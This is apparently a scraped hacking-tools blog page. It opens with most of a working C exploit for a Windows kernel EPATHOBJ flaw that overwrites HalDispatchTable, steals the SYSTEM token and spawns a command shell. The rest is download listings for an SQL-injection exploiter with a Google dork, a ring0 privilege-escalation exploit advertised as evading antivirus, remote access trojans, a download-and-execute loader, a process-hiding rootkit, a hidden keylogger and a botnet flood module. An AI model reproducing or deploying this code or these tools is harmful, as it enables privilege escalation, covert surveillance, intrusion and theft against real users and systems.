//   a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868
//   a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4])
//   a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame @ a03aba2c)
//   a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo])
//   a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0])
//   a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4])
//   a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ a03abc14)
//   0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
//   0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0])
//   WARNING: Stack unwind information not available. Following frames may be wrong.
//   0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f
//   0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade
//   0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
//   0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [SEH])
//   0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo])
//   kd> .trap a03aba2c
//   ErrCode = 00000002
//   eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8
//   eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0         nv up ei ng nz na pe nc
//   cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
//   win32k!EPATHOBJ::pprFlattenRec+0x82:
//   8f18972e 8918            mov     dword ptr [eax],ebx  ds:0023:cccccccc=????????
//   kd> vertarget
//   Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible
//   Product: WinNt, suite: TerminalServer SingleUserTS
//   Built by: 9200.16581.x86fre.win8_gdr.130410-1505
//   Machine Name:
//   Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48
//   Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00)
//   System Uptime: 0 days 0:02:30.432
//   kd> .bugcheck
//   Bugcheck code 00000050
//   Arguments cccccccc 00000001 8f18972e 00000002
//
// EXPLOITATION
//
// We're somewhat limited with what we can do, as we don't control what's
// written, it's always a pointer to a PATHRECORD object. We can clobber a
// function pointer, but the problem is making it point somewhere useful.
//
// The solution is to make the Next pointer a valid sequence of instructions,
// which jumps to our second stage payload. We have to do that in just 4 bytes
// (unless you can find a better call site, let me know if you spot one).
//
// Thanks to progmboy for coming up with the solution: you reach back up the
// stack and pull a SystemCall parameter out of the stack. It turns out
// NtQueryIntervalProfile matches this requirement perfectly.
//
// INSTRUCTIONS
//
// C:\> cl ComplexPath.c
// C:\> ComplexPath
//
// You might need to run it several times before we get the allocation we need,
// it won't crash if it doesn't work, so you can keep trying. I'm not sure how
// to improve that.
//
// CREDIT
//
// Tavis Ormandy <taviso () cmpxchg8b com>
// progmboy <programmeboy () gmail com>
//

POINT       Points[MAX_POLYPOINTS];
BYTE        PointTypes[MAX_POLYPOINTS];
HRGN        Regions[MAX_REGIONS];
ULONG       NumRegion = 0;
HANDLE      Mutex;
DWORD       Finished = 0;

// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;

BOOL LogMessage(LEVEL Level, PCHAR Format, ...);

// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH   0x00000001
#define PD_ENDSUBPATH     0x00000002
#define PD_RESETSTYLE     0x00000004
#define PD_CLOSEFIGURE    0x00000008
#define PD_BEZIERS        0x00000010

typedef struct  _POINTFIX
{
    ULONG x;
    ULONG y;
} POINTFIX, *PPOINTFIX;

// Approximated from reverse engineering.
typedef struct _PATHRECORD {
    struct _PATHRECORD *next;
    struct _PATHRECORD *prev;
    ULONG               flags;
    ULONG               count;
    POINTFIX            points[4];
} PATHRECORD, *PPATHRECORD;

PPATHRECORD PathRecord;
PATHRECORD  ExploitRecord;
PPATHRECORD ExploitRecordExit;

enum { SystemModuleInformation = 11 };
enum { ProfileTotalIssues = 2 };

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR  FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

FARPROC NtQuerySystemInformation;
FARPROC NtQueryIntervalProfile;
FARPROC PsReferencePrimaryToken;
FARPROC PsLookupProcessByProcessId;
PULONG  HalDispatchTable;
ULONG   HalQuerySystemInformation;
PULONG  TargetPid;
PVOID  *PsInitialSystemProcess;

// Search the specified data structure for a member with CurrentValue.
BOOL FindAndReplaceMember(PDWORD Structure,
                          DWORD CurrentValue,
                          DWORD NewValue,
                          DWORD MaxSize)
{
    DWORD i, Mask;

    // Microsoft QWORD aligns object pointers, then uses the lower three
    // bits for quick reference counting.
    Mask = ~7;

    // Mask out the reference count.
    CurrentValue &= Mask;

    // Scan the structure for any occurrence of CurrentValue.
    for (i = 0; i < MaxSize; i++) {
        if ((Structure[i] & Mask) == CurrentValue) {
            // And finally, replace it with NewValue.
            Structure[i] = NewValue;
            return TRUE;
        }
    }

    // Member not found.
    return FALSE;
}


// This routine is injected into nt!HalDispatchTable by EPATHOBJ::pprFlattenRec.
ULONG __stdcall ShellCode(DWORD Arg1, DWORD Arg2, DWORD Arg3, DWORD Arg4)
{
    PVOID  TargetProcess;

    // Record that the exploit completed.
    Finished = 1;

    // Fix the corrupted HalDispatchTable,
    HalDispatchTable[1] = HalQuerySystemInformation;

    // Find the EPROCESS structure for the process I want to escalate
    if (PsLookupProcessByProcessId(TargetPid, &TargetProcess) == STATUS_SUCCESS) {
        PACCESS_TOKEN SystemToken;
        PACCESS_TOKEN TargetToken;

        // Find the Token object for my target process, and the SYSTEM process.
        TargetToken = (PACCESS_TOKEN) PsReferencePrimaryToken(TargetProcess);
        SystemToken = (PACCESS_TOKEN) PsReferencePrimaryToken(*PsInitialSystemProcess);

        // Find the token in the target process, and replace with the system token.
        FindAndReplaceMember((PDWORD) TargetProcess,
                             (DWORD)  TargetToken,
                             (DWORD)  SystemToken,
                             0x200);
    }

    return 0;
}

DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
    // Here we wait for the main thread to get stuck inside FlattenPath().
    WaitForSingleObject(Mutex, CYCLE_TIMEOUT);

    // It looks like we've taken control of the list, and the main thread
    // is spinning in EPATHOBJ::bFlatten. We can't continue because
    // EPATHOBJ::pprFlattenRec exit's immediately if newpathrec() fails.

    // So first, we clean up and make sure it can allocate memory.
    while (NumRegion) DeleteObject(Regions[--NumRegion]);

    // Now we switch out the Next pointer for our exploit record. As soon
    // as this completes, the main thread will stop spinning and continue
    // into EPATHOBJ::pprFlattenRec.
    InterlockedExchangePointer(&PathRecord->next,
                               &ExploitRecord);
    return 0;
}

// I use this routine to generate a table of acceptable stub addresses. The
// 0x40 offset is the location of the PULONG parameter to
// nt!NtQueryIntervalProfile. Credit to progmboy for coming up with this clever
// trick.
VOID __declspec(naked) HalDispatchRedirect(VOID)
{
    __asm inc eax
    __asm jmp dword ptr [ebp+0x40]; //  0
    __asm inc ecx
    __asm jmp dword ptr [ebp+0x40]; //  1
    __asm inc edx
    __asm jmp dword ptr [ebp+0x40]; //  2
    __asm inc ebx
    __asm jmp dword ptr [ebp+0x40]; //  3
    __asm inc esi
    __asm jmp dword ptr [ebp+0x40]; //  4
    __asm inc edi
    __asm jmp dword ptr [ebp+0x40]; //  5
    __asm dec eax
    __asm jmp dword ptr [ebp+0x40]; //  6
    __asm dec ecx
    __asm jmp dword ptr [ebp+0x40]; //  7
    __asm dec edx
    __asm jmp dword ptr [ebp+0x40]; //  8
    __asm dec ebx
    __asm jmp dword ptr [ebp+0x40]; //  9
    __asm dec esi
    __asm jmp dword ptr [ebp+0x40]; // 10
    __asm dec edi
    __asm jmp dword ptr [ebp+0x40]; // 11

    // Mark end of table.
    __asm {
        _emit 0
        _emit 0
        _emit 0
        _emit 0
    }
}

int main(int argc, char **argv)
{
    HANDLE               Thread;
    HDC                  Device;
    ULONG                Size;
    ULONG                PointNum;
    HMODULE              KernelHandle;
    PULONG               DispatchRedirect;
    PULONG               Interval;
    ULONG                SavedInterval;
    RTL_PROCESS_MODULES  ModuleInfo;

    LogMessage(L_INFO, "\r--------------------------------------------------\n"
                       "\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
                       "\r------------------- taviso () cmpxchg8b com, programmeboy () gmail com ---\n"
                       "\n");

    NtQueryIntervalProfile    = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
    NtQuerySystemInformation  = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
    Mutex                     = CreateMutex(NULL, FALSE, NULL);
    DispatchRedirect          = (PVOID) HalDispatchRedirect;
    Interval                  = (PULONG) ShellCode;
    SavedInterval             = Interval[0];
    TargetPid                 = GetCurrentProcessId();

    LogMessage(L_INFO, "NtQueryIntervalProfile () %p", NtQueryIntervalProfile);
    LogMessage(L_INFO, "NtQuerySystemInformation () %p", NtQuerySystemInformation);

    // Lookup the address of system modules.
    NtQuerySystemInformation(SystemModuleInformation,
                             &ModuleInfo,
                             sizeof ModuleInfo,
                             NULL);

    LogMessage(L_DEBUG, "NtQuerySystemInformation() => %s () %p",
                        ModuleInfo.Modules[0].FullPathName,
                        ModuleInfo.Modules[0].ImageBase);

    // Lookup some system routines we require.
    KernelHandle                = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
    HalDispatchTable            = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable")           - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
    PsInitialSystemProcess      = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess")     - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
    PsReferencePrimaryToken     = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken")    - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
    PsLookupProcessByProcessId  = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;

    // Search for a ret instruction to install in the damaged HalDispatchTable.
    HalQuerySystemInformation   = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
                                - (ULONG) KernelHandle
                                + (ULONG) ModuleInfo.Modules[0].ImageBase;

    LogMessage(L_INFO, "Discovered a ret instruction at %p", HalQuerySystemInformation);

    // Create our PATHRECORD in user space we will get added to the EPATHOBJ
    // pathrecord chain.
    PathRecord = VirtualAlloc(NULL,
                              sizeof *PathRecord,
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);

    LogMessage(L_INFO, "Allocated userspace PATHRECORD () %p", PathRecord);

    // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
    // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
    // loop in EPATHOBJ::bFlatten().
    PathRecord->flags   = 0;
    PathRecord->next    = PathRecord;
    PathRecord->prev    = (PPATHRECORD)(0x42424242);

    LogMessage(L_INFO, "  ->next  @ %p", PathRecord->next);
    LogMessage(L_INFO, "  ->prev  @ %p", PathRecord->prev);
    LogMessage(L_INFO, "  ->flags @ %u", PathRecord->flags);

    // Now we need to create a PATHRECORD at an address that is also a valid
    // x86 instruction, because the pointer will be interpreted as a function.
    // I've created a list of candidates in DispatchRedirect.
    LogMessage(L_INFO, "Searching for an available stub address...");

    // I need to map at least two pages to guarantee the whole structure is
    // available.
    while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
                         PAGE_SIZE * 2,
                         MEM_COMMIT | MEM_RESERVE,
                         PAGE_EXECUTE_READWRITE)) {

        LogMessage(L_WARN, "\tVirtualAlloc(%#x) => %#x",
                            *DispatchRedirect & ~(PAGE_SIZE - 1),
                            GetLastError());

        // This page is not available, try the next candidate.
        if (!*++DispatchRedirect) {
            LogMessage(L_ERROR, "No redirect candidates left, sorry!");
            return 1;
        }
    }

    LogMessage(L_INFO, "Success, ExploitRecordExit () %#0x", *DispatchRedirect);

    // This PATHRECORD must terminate the list and recover.
    ExploitRecordExit           = (PPATHRECORD) *DispatchRedirect;
    ExploitRecordExit->next     = NULL;
    ExploitRecordExit->prev     = NULL;
    ExploitRecordExit->flags    = PD_BEGINSUBPATH;
    ExploitRecordExit->count    = 0;

    LogMessage(L_INFO, "  ->next  @ %p", ExploitRecordExit->next);
    LogMessage(L_INFO, "  ->prev  @ %p", ExploitRecordExit->prev);
    LogMessage(L_INFO, "  ->flags @ %u", ExploitRecordExit->flags);

    // This is the second stage PATHRECORD, which causes a fresh PATHRECORD
    // allocated from newpathrec to nt!HalDispatchTable. The Next pointer will
    // be copied over to the new record. Therefore, we get
    //
    // nt!HalDispatchTable[1] = &ExploitRecordExit.
    //
    // So we make &ExploitRecordExit a valid sequence of instuctions here.
    LogMessage(L_INFO, "ExploitRecord () %#0x", &ExploitRecord);

    ExploitRecord.next          = (PPATHRECORD) *DispatchRedirect;
    ExploitRecord.prev          = (PPATHRECORD) &HalDispatchTable[1];
    ExploitRecord.flags         = PD_BEZIERS | PD_BEGINSUBPATH;
    ExploitRecord.count         = 4;

    LogMessage(L_INFO, "  ->next  @ %p", ExploitRecord.next);
    LogMessage(L_INFO, "  ->prev  @ %p", ExploitRecord.prev);
    LogMessage(L_INFO, "  ->flags @ %u", ExploitRecord.flags);

    LogMessage(L_INFO, "Creating complex bezier path with %x", (ULONG)(PathRecord) >> 4);

    // Generate a large number of Belier Curves made up of pointers to our
    // PATHRECORD object.
    for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
        Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
        Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
        PointTypes[PointNum]    = PT_BEZIERTO;
    }

    // Switch to a dedicated desktop so we don't spam the visible desktop with
    // our Lines (Not required, just stops the screen from redrawing slowly).
    SetThreadDesktop(CreateDesktop("DontPanic",
                                   NULL,
                                   NULL,
                                   0,
                                   GENERIC_ALL,
                                   NULL));

    // Get a handle to this Desktop.
    Device = GetDC(NULL);

    // Take ownership of Mutex
    WaitForSingleObject(Mutex, INFINITE);

    // Spawn a thread to cleanup
    Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);

    LogMessage(L_INFO, "Begin CreateRoundRectRgn cycle");

    // We need to cause a specific AllocObject() to fail to trigger the
    // exploitable condition. To do this, I create a large number of rounded
    // rectangular regions until they start failing. I don't think it matters
    // what you use to exhaust paged memory, there is probably a better way.
    //
    // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
    // failure. Seriously, do some damn QA Microsoft, wtf.
    for (Size = 1 << 26; Size; Size >>= 1) {
        while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
            NumRegion++;
    }

    LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);

    LogMessage(L_INFO, "Flattening curves...");

    for (PointNum = MAX_POLYPOINTS; PointNum && !Finished; PointNum -= 3) {
        BeginPath(Device);
        PolyDraw(Device, Points, PointTypes, PointNum);
        EndPath(Device);
        FlattenPath(Device);
        FlattenPath(Device);

        // Test if exploitation succeeded.
        NtQueryIntervalProfile(ProfileTotalIssues, Interval);

        // Repair any damage.
        *Interval = SavedInterval;

        EndPath(Device);
    }

    if (Finished) {
        LogMessage(L_INFO, "Success, launching shell...", Finished);
        ShellExecute(NULL, "open", "cmd", NULL, NULL, SW_SHOW);
        LogMessage(L_INFO, "Press any key to exit...");
        getchar();
        ExitProcess(0);
    }

    // If we reach here, we didn't trigger the condition. Let the other thread know.
    ReleaseMutex(Mutex);
    WaitForSingleObject(Thread, INFINITE);
    ReleaseDC(NULL, Device);

    // Try again...
    LogMessage(L_ERROR, "No luck, run exploit again (it can take several attempts)");
    LogMessage(L_INFO, "Press any key to exit...");
    getchar();
    ExitProcess(1);
}

// A quick logging routine for debug messages.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
{
    CHAR Buffer[1024] = {0};
    va_list Args;

    va_start(Args, Format);
        vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args);
    va_end(Args);

    switch (Level) {
        case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break;
        case L_INFO:  fprintf(stdout, "[+] %s\n", Buffer); break;
        case L_WARN:  fprintf(stderr, "[*] %s\n", Buffer); break;
        case L_ERROR: fprintf(stderr, "[!] %s\n", Buffer); break;
    }

    fflush(stdout);
    fflush(stderr);

    return TRUE;
}

Categories:

Tool for Exploiter WHMCS 5.2.8 - SQL Injection Vulnerability by GOTHIE

1:07 PM Leave a Reply
Tool for Exploiter WHMCS 5.2.8 - SQL Injection Vulnerability by GOTHIE
# Support PROXY (To Google does not block your IP)
# Do not duplicate Adds Domains List to test the exploit
# MultThreads sending and Exploit test, speeding up the process!
# Check if the Security Level allows the user to read files load_file (0x2f6574632f706173737764)

# Exploit Title: WHMCS 5.2.8 SQL Injection
# Google Dork: "powered by WHMCS"
# Date: 10/18/2013
# Exploit Author: g00n ( Xploiter.net )
# Vendor Homepage: http://www.whmcs.com/
# Software Link: http://www.whmcs.com/
# Version: 5.2.8


Download
Categories:

Ring0 LPE Exploit CVE-2015-0057 [All win versions]

1:06 PM Leave a Reply
Ring0 LPE Exploit CVE-2015-0057 [All win versions]
Ring0 LPE Exploit CVE-2015-0057 [All win versions]
Vulnerability: CVE-2015-0057 (Published: February 10, 2015)
Supported versions: XP/2003/Vista/2008/W7/W8/2012/W8.1/2012R2/W10TP
Supported architecture: x86/x64
Development stage: v1.1.1900 (stable)
Shellcode size x86: 13Kb
Shellcode size x64: 16Kb


Bypass all possible Windows security defences:

* SMEP
* Kernel DEP
* KASLR
* Integrity Level (escape from Low)
* NULL Dereference Protection
* UAC

There are no public POCs on this vulnerability.
Shellcode has ready for immediate use in your projects. The test demo sources are supplied.
Exploit is extremely stable, no bsods or error messages.
Can be run under Guest account from Low Integrity Level.

Successfully bypasses proactive defences of:
* KIS 2015
* Avast IS 2015
* ESET Smart Security 8

Download
Categories:

Tiny (Remote Administration Tool) - v0.1

12:59 PM Leave a Reply
Tiny (Remote Administration Tool) - v0.1
Using the clients tabs:

Connections Tab:
In the connections tab, you have control of one (Or multiple, if selected) clients in the list.

Commands:
- Message Box
- Download File

- Disconnect
- Kill Server

Tasks Tab:
The tasks tab is used to broadcast commands to all clients by adding them to the task list.

Settings Tab:
Set a port to listen on (1-65535), and click "Listen".
For now, only the port information is required.

Builder Tab:
Set the DNS or IP you wish your server to connect to.
Then, set the port which you are listening on in the "Settings Tab".
For now, only the "DNS/Host", "Port" are required.

Download
Categories:

H1N1 Loader[FIXED2]

12:58 PM 1 Comment
H1N1 Loader[FIXED2]
H1N1 is a new project of me. Its an opensource Loader written in MASM, using PHP/MySQL to get commands from the Server. The Master can command his customers with the Command&Control Tool.
By using Authentification, only the "real" master can access on the server.

Current Features:
-Using AppPath and HKCU Startup to have a better compitability with WinVista/7
-Mutexcheck will avoid multiple instances
-Close/Uninstall Bot
-Download&Execute Bot
-Compiled at runtime, using hardcoded Settings -> cryptable with all crypters



Categories:

Pytho [R.A.T.] 1.4 Developer Preview

12:56 PM Leave a Reply
Pytho [R.A.T.] 1.4 Developer Preview
Pytho 1.4 Developer Preview


What's new?
Smoother Screencapture
New Notification popup
No more List index out of bounds errors
Shows Datasize in Caption of Screencapture
Pytho SDK
UNICODE Offline Keylogger
100% UNICODE Support for all languages
Tested with 1000+ connections - stable!


Plugins!
Pytho is now fully customizable (server.exe only)!
OnPluginMessage - send your plugins messages!
OnInitializeSettings - Change pytho settings in runtime!
OnFinalizedSettings - Know all pytho settings!
OnConnect - know when pytho is connected!
OnDisconnect - know when pytho has disconnected!


ServerSize : 87kb (NO UPX)

Download

Categories:

Rootkit Ring 3 - Process Hider

12:51 PM Leave a Reply
Rootkit Ring 3 - Process Hider
Ring 3 Rootkit - Process Hider by bosh 28.10.2013
-----------------------------------------------------

Function:
-Hides any process from the Taskmanager which has "hide" as first symbols in name

Example: hideFirefox.exe

Usage:
1.Put the 2 files "HideProcessesDLL.dll" and "hideThis.exe" in the same directory.
2.Start "hideThis.exe"

Working environment:
Any x86 Windows OS


For special inquiries please write me a PM with budget estimation
Download

Categories:

SKL4 - Best Unicode Keylogger

12:50 PM Leave a Reply
SKL4 - Best Unicode Keylogger
Small Keylogger V4 (SKL4)

Small bin Size - 5KB - UPX (Compiled with Delphi 3 and no RTL!)
Runs in background. No visible GUI - if you want to close it use taskmgr or process explorer!
Creates log.txt in the same folder.
100% UNICODE compatible.
Uses UTF-8 Encoding to decrease the log size.
Shows Windowname.
Captures all special keys such as [CTRL]/[ALT]/[SHIFT]/etc...
Avoids multiple KeyStrokes like [ALT][ALT][ALT] (if you hold the ALT key...)
x64 compatible.
Runs on most Windows Versions (XP/7/8/8.1).
Guaranteed no loss of keystrokes.
No dependencies.
FREE


If you can't find a log.txt please run the keylogger as admin or move it to temp/appdata where
keylogger has permission to create the log.txt file.

Download
Categories:

Scan4You Context scanner [freeware]

12:49 PM Leave a Reply
Scan4You Context scanner [freeware]
As says in title, this is freeware made by me.
I made this app for my personal use, i just got tired of scanning files from crypter or via web, so i decided to make my life a little easier.

Here are some screenshots:

CONTEXT MENU:


WAITING FOR RESULTS:


SCAN DONE:


SETTINGS:


ALL FILES ARE DIGITALY SIGNED WITH VALID CERTIFICATES:




There is one false-positive with F-PROT on scanner.exe, however as i mentioned all files digitals signed with my personal cert - so no malware inside.

Free to use or distribute, just give credits.

DOWNLOAD
Categories:

Pandora RAT 2.2 Beta Released!

12:48 PM Leave a Reply
Pandora RAT 2.2 Beta Released!
Change & Fix Log - 2.2 Beta

+ New persistence method
+ Botnet TCP flood module
+ Connection Group List (Create + View)

- UAC Bypass (to cause poor performance. Adding to next versions is better.)
- Protect Process (to be repaired)


& File Manager "Preview file" module fixed.
& Process module list bug fixed.
& Active Connection request bug fixed.
& Connection timeout bug fixed.
& Webcam freezing error fixed.
& Keylogger stream error fixed.
& Network Shares duplicate list bug fixed.
& Chat system lost message bug fixed.
& System Privilege duplicate list bug fixed.
& Startup manager duplicate list bug fixed.
& Script editor module updated and bug fixed.
& Lan computer list crash bug fixed.
& Remote Printer method is better now.
& Plug-in upload problem fixed.
& Socks5 module updated.
& Builder options compress module updated and fixed.

Download
Categories:

SafeLoader v2.0 Beta

12:46 PM Leave a Reply
SafeLoader v2.0 Beta


Features:
-Coded in VBS (Work in All Windows)
-Anti-Track Panel
-Easy to Install
-All Traffic is Encrypted
-StartUP with Startup Folders
-StartUP with Regedit
-Startup with Windows Tasks
-GeoLocation with GeoIP
-VBS Downloader and Load in Memory
-Stable Update
-Full Uninstall
-Small Size (8Kb)
-Easy Cryptable
-Fuck UAC, SandBox and Firewall

Credits:
-MadAntrax
-Strup
-Houdini (This bot is based in H-Worm)

Download:
File Uploaded to board.

PD: Next Version will be Polymorphic.

//Regards.SafeLoader 2.0.zip
Categories: